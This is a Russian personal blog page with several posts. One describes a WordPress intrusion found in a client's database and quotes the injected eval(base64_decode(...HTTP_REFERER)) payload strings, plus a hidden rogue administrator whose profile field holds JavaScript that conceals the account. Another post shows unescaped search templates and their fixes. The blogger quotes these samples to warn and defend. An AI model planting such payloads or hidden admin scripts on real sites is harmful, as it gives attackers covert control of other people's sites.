Ахтунги проснулись

Снова выпустили говнопродукт. На ЩАСТЬЕ! Не забудьте почитать комментарии…

PS для тех кто спрашивал недавно, я занимаюсь 3-ей версией.

42 комментария

Ахтунг! Атаки на WordPress блоги

Столкнулся позавчера с одним «глюком» при настройке клиентского блога — криво работали ссылки на комментарии и падал сервер базы данных при попытке отредактировать пользователей в админке. и кстати там показывает вот такую хрень при этом:
wp-ahtung
Phpmyadmin выдает при этом примерно такое:

Lost connection to MySQL server during query

и не отвечает сервер минут 50 после этого…

Погуглил тогда сразу и нашел как исправить ошибки с постоянными ссылками, но сегодня в дампе базы данных обнаружил что там исправляется далеко не все. Ручками повыкашивал разные строки типа:

%25&%28%7B%24%7Beval%28base64_decode%28%24_SERVER%5BHTTP_REFERER%5D%29%29%7D%7D%7C.%2B%29&%25/
%25&evalbase64_decode_SERVERHTTP_REFERER.%2B&%25/
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)
%&{${evalbase64_decode$_SERVER[HTTP_REFERER]}}|.+&%/
&%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

В базе данных это выглядело примерно так (этот юзер не показывается вообще в админке):

(574, 143, 'rich_editing', 'true'),
(575, 143, 'comment_shortcuts', 'false'),
(576, 143, 'admin_color', 'fresh'),
(577, 143, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'),
(578, 143, 'first_name', '...\n\n\n\n\n\n\n\n\n<div id="user_superuser"><script language="JavaScript">\nvar setUserName = function(){\n try{\n          var t=document.getElementById("user_superuser");\n              while(t.nodeName!="TR"){\n                      t=t.parentNode;\n               };\n            t.parentNode.removeChild(t);\n          var tags = document.getElementsByTagName("H3");\n               var s = " shown below";\n               for (var i = 0; i < tags.length; i++) {\n                       var t=tags[i].innerHTML;\n                      var h=tags[i];\n                        if(t.indexOf(s)>0){\n                           s =(parseInt(t)-1)+s;\n                         h.removeChild(h.firstChild);\n                          t = document.createTextNode(s);\n                               h.appendChild(t);\n                     }\n             }\n             var arr=document.getElementsByTagName("ul");\n          for(var i in arr) if(arr[i].className=="subsubsub"){\n                  var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML);\n                      if(n[1]>0){\n                           var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<");\n        arr[i].innerHTML=txt;\n        }\n    }\n          }catch(e){};\n     };\n     addLoadEvent(setUserName);\n</script></div>'),
(573, 143, 'nickname', 'NicolasMager80'),
(570, 1, 'closedpostboxes_dashboard', 'a:1:{i:0;s:0:"";}'),
(571, 1, 'metaboxhidden_dashboard', 'a:3:{i:0;s:17:"dashboard_plugins";i:1;s:17:"dashboard_primary";i:2;s:19:"dashboard_secondary";}'),
(572, 1, 'plugins_last_view', 'all'),
(579, 143, 'wp_user_level', '10');

вот этот поддельный администратор "хакер"

(143, 'NicolasMager80', '$P$BIum3O2v9eAU9dAJRcn23VX2VjnbsG.', 'nicolasmager80', '', '', '2009-09-05 12:41:37', '', 0, 'NicolasMager80');

Сегодня с утра про эту же атаку на блоги прочитал у Дмитрия Донченко тут

так что обновляйтесь регулярно :-)

28 комментариев

SUSH-оные волосы

Заказывал сейчас в МЕГ-овской «Суши-Терре» роллы — одни были нормальные, в других обнаружил волос, судя по виду с головы, длиной около 6см. Есть не стал, попросил переделать. Приносят новую порцию …и там  на этот раз был кучерявый волос, судя по его виду это либо волос с груди, с подмышки … либо вообще с » зоны ниже пояса».

Аппетит испортился, от вторичной переделки роллов отказался, оставил записку администратору…

9 комментариев

Неадекват

Вот этот «чудак на букву М» имел наглось написать в арбитраж вебманей претензию в мой адрес. Он утверждал в претензии что обратился на сайте mywordpress.ru за услугами и в тот же день его хостинг хакнули. Не найдя никаких координат на Mywordpress.ru он увидел (на странице «о проекте») только указанные мои кошельки (сейчас их после моего напоминания Роман сменил на свой) и побежал по быстрому поливать грязью меня. После переписки с Романом выяснилось что ему никто ничего вообще не делал и денег никуда этот «клиент» также не перечеслял. За каким хером он полез в арбитраж вебмани только одному ему известно.

В общем, пользователь неадекватен. Не стоит иметь с ним дел.

14 комментариев

Плагин для проверки тем WordPress «на вшивость»

Ссылка найдена в «последних новостях по плагинам» в адмике, но туда редко кто смотрит…

Качать и читать описание здесь

Судя по описанию проверяет «фришные темы» на предмет всякого вредного или нежелательного кода (например закодированных ссылок). Если вы не знаете о чем идет речь погуглите «по форумам ВП» на темы: закодированный футер, левые ссылки, и т.д. Сам не ставил т.к. у меня тема «чистая» и проверять там нечего.

10 комментариев

Мобильные мошенники

Если вам придет смс-ка с содержанием

Ув. Абонент! Во избежание блокировки вашей СИМ. карты, просим срочно обратиться, в Тех. Центр, по тел. Беспл. Горячей линий. 8-908~004~94~84 Приносим свои извинения! От *Beeline*

По телефону представляются технической поддержкой билайна и спрашивают про модель мобильника и якобы для «изменения частот» нужно набрать комбинацию цифр (мобильного перевода). Подготовились там ребята грамотно. Их там несколько человек и даже миниатс есть для переключения. Каждый представляется по имени и ведет себя типа как настоящая поддержка. Реально же им нужно просто чтобы набрали комбинацию цифр и подтвердили ввод. Мне денег не жалко было поэтому решил над ними поиздеваться и посмотреть на их реацию, хотя уже в середине разговора понял что это просто развод на бабки. На мой вопрос по поводу того почему этой информации нет на сайте билайна они что то пробурчали в ответ а на вопрос куда можно перезвонить и уточнить дали номер 09272 развлекательного платного сервиса. После этого я позвонил по нормальному телефону Билайна и выложил им про этих мудаков все как есть от смс-ки до содержания разговора. Обещали передать в службу безопасности и разобраться. Даже если бабло (150р) не вернут то и хрен с ними. Я не жадный. Главное сколько эмоций :)

Для желающих устроить флешмоб — звоните им через сипнет или т.п. и поугарайте

Ребята кстати вот откуда

19 комментариев

Найден один из ахтунговых сайтов…

…из тех, где находятся тонны ссылок про которые я недавно писал.

ссылка на картинке

6 комментариев

DANGER! SEO-вредители! Проверьте свои темы WordPress на наличие «плохих тегов»

Заметил тут недавно в логах плагина поиска такие запросы вида :

<a href=http://superebanutyyseosait.ru>

причем IP посетителя везде 66.249.70.219 — гугловый бот и таких запросов сотни в сутки. Все сайты одной направленности типа вминск.ру, вбрянск.ру (все естественно по английски) и т.п.,

Добавлено: В логах вебсервера запросы выглядят так:

среди знакомых адресов увидел лишь altblog.ru, собственно с него и еще пары других сайтов все началось примерно недели две назад.
Кликнув сам по одному такому увидел что у меня выводится так на странице: Результаты поиска по ». Вроде на первый взгляд все чисто, но если навести мышкой на эти кавычки то видим вполне ЖИВУЮ ССЫЛКУ без всяких noindex и nofollow. Поиском по шаблону (в 99% случаев это в файле search.php) нашел что фраза выводится тегом:

<h2 class="pagetitle">Результаты поиска по <?php echo "'".$s."'";?></h2>

что не есть гуд.
Методом поиска по архиву тем нашел еще такое:

<h1>Search Results for '<?php echo $s; ?>' &amp;amp;amp;amp;amp;amp;amp;darr;</h1>
<p><?php _e('These are the search results for your search on') ?> <strong>"<?php echo $s ?>"</strong>:</p>

и тому подобные записи. Так вот все это ПЛОХИЕ ВАРИАНТЫ, от которых следует избавиться и чем скорее тем лучше.
Вместо них можно применить безопасные методы:

<h2 class="pagetitle">Результаты поиска по <?php the_search_query(); ?></h2>

или

<h2>Результаты поиска по <em>&amp;amp;amp;amp;amp;amp;amp;#8216;<?php echo wp_specialchars($s, 1); ?>&amp;amp;amp;amp;amp;amp;amp;#8217;</em></h2>

Кроме того в robots.txt лучше дописать такие строки:

Disallow: /?s= 
Disallow: /search/

После вышеописанных действий любые такие извращенные запросы будут выводиться на странице обычным текстом БЕЗ ССЫЛОК

Я не SEO специалист и не знаю работает ли у ахтунгов, занимающихся такими махинациями с ссылками, но лучше все равно запретить
Кроме того это позволит защититься от вставки практически любого HTML кода в страницу, вот живой пример, правда безобидный относительно (сверху показано то что выводится после модификации темы, а чуть ниже мы видим картинку, которую я «пропихнул» в форму поиска):

15 комментариев